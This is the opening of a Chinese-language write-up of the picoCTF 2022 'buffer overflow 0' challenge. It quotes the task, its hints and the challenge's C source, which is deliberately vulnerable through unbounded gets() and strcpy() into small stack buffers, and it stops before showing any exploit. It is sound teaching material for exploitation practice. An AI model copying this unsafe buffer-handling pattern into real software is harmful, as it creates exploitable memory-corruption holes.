# picoCTF 2022 buffer overflow 0 解題 ## 前言 這是我第一次解 picoCTF 的題目，對於整個的流程都還不是那麼熟悉，不過我還是稍微整理了一下這一題的解題過程，當作一個紀錄。 ## 題目 ##### AUTHOR: ALEX FULTON / PALASH OSWAL ### Description Smash the stack Let's start off simple, can you overflow the correct buffer? The program is available [here](https://artifacts.picoctf.net/c/520/vuln). You can view source [here](https://artifacts.picoctf.net/c/520/vuln.c). And connect with it using: ``` nc saturn.picoctf.net 53935 ``` ### Hints 1. How can you trigger the flag to print? 2. If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren't expecting. 3. Run `man gets` and read the BUGS section. How many characters can the program really read? ###### tags: `Binary Exploitation` `gets` ## 解題過程 首先將上述兩個檔案下載下來，分別是一隻C程式 `vuln.c` 與一個可執行程式 `vuln`。這隻可執行程式是跑在Linux下的，而我們下載的C程式是可執行程式的原始碼，那就先來看一下程式的原始碼吧: ```C=1 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #define FLAGSIZE_MAX 64 char flag[FLAGSIZE_MAX]; void sigsegv_handler(int sig) { printf("%s\n", flag); fflush(stdout); exit(1); } void vuln(char *input){ char buf2[16]; strcpy(buf2, input); } int main(int argc, char **argv){ FILE *f = fopen("flag.txt","r"); if (f == NULL) { printf("%s %s", "Please create 'flag.txt' in this directory with your", "own debugging flag.\n"); exit(0); } fgets(flag,FLAGSIZE_MAX,f); signal(SIGSEGV, sigsegv_handler); // Set up signal handler gid_t gid = getegid(); setresgid(gid, gid, gid); printf("Input: "); fflush(stdout); char buf1[100]; gets(buf1); vuln(buf1); printf("The program will exit now\n"); return 0; } ``` 我們可以看到main會去讀取flag.txt，這些都不是重點